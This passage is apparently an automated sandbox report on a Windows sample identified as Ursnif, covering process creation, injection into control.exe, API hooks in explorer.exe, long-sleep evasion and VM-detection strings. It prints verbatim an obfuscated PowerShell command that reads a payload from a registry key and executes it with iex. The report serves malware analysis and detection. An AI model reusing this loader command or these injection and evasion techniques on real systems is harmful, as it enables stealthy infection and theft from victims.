Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE2A5.tmp" "c:\Users\user\AppData\Local\Temp\CSCC346B8403E7B4A1592C575AE3967513E.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\n2sgiaoa.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEB8E.tmp" "c:\Users\user\AppData\Local\Temp\CSC1B282484FFBD4A98A4CBD8847ACCD8A8.TMP"
Source: C:\Users\user\Desktop\bf.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Users\user\Desktop\bf.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rxihymmmsf -value gp; new-alias -name qvfmhhdt -value iex; qvfmhhdt ([System.Text.Encoding]::ASCII.GetString((rxihymmmsf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4rgoqrxw.cmdline Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\n2sgiaoa.cmdline Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE2A5.tmp" "c:\Users\user\AppData\Local\Temp\CSCC346B8403E7B4A1592C575AE3967513E.TMP" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEB8E.tmp" "c:\Users\user\AppData\Local\Temp\CSC1B282484FFBD4A98A4CBD8847ACCD8A8.TMP" Jump to behavior
Source: C:\Users\user\Desktop\bf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1sgyoy32.ak1.ps1 Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winEXE@15/16@2/1
Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{44FBAADD-D3CD-1679-7DB8-B7AA016CDB7E}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{203ACFCB-FFA6-5208-8954-A3A6CDC8873A}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5680:120:WilError_01
Source: C:\Users\user\Desktop\bf.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\bf.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: ntdll.pdb source: bf.exe, 00000000.00000003.678579169.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, bf.exe, 00000000.00000003.670942941.0000000003E50000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: bf.exe, 00000000.00000003.678579169.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, bf.exe, 00000000.00000003.670942941.0000000003E50000.00000004.00001000.00020000.00000000.sdmp
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4rgoqrxw.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\n2sgiaoa.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4rgoqrxw.cmdline Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\n2sgiaoa.cmdline Jump to behavior
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\n2sgiaoa.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\4rgoqrxw.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567067174.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567273326.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567261727.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567123071.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.615812905.00000000011AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.614908224.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567222358.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567018917.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567191863.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.714710213.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.612073912.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: bf.exe PID: 1364, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4604, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3324, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 4784, type: MEMORYSTR
Source: Yara match File source: 0.3.bf.exe.13294a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.bf.exe.12aa4a0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.bf.exe.12aa4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.bf.exe.1355940.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.bf.exe.13294a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.bf.exe.1355940.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000000.681883913.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.613944350.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.680871269.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.684080193.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.614315107.0000000001329000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFA26CE521C
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFA26CE5200
Source: C:\Users\user\Desktop\bf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\bf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4756 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\n2sgiaoa.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\4rgoqrxw.dll Jump to dropped file
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9741 Jump to behavior
Source: C:\Users\user\Desktop\bf.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 0000000B.00000002.733204558.0000000008631000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 0000000B.00000000.686042828.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
Source: explorer.exe, 0000000B.00000000.686042828.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: control.exe, 0000000C.00000002.723650816.00000262EC513000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000B.00000002.739217384.000000000ECDA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.716253522.000000000ECDA000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000000B.00000000.686042828.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: control.exe, 0000000C.00000002.723789714.00000262EC534000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&u
Source: mshta.exe, 00000004.00000002.635584727.00000212A473E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000B.00000002.733204558.0000000008631000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

HIPS / PFW / Operating System Protection Evasion
barindex
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\bf.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\bf.exe Memory written: C:\Windows\System32\control.exe base: 7FF7F7F712E0 Jump to behavior
Source: C:\Users\user\Desktop\bf.exe Memory written: C:\Windows\System32\control.exe base: 7FF7F7F712E0 Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\bf.exe Thread register set: target process: 4784 Jump to behavior
Creates a thread in another existing process (thread injection)
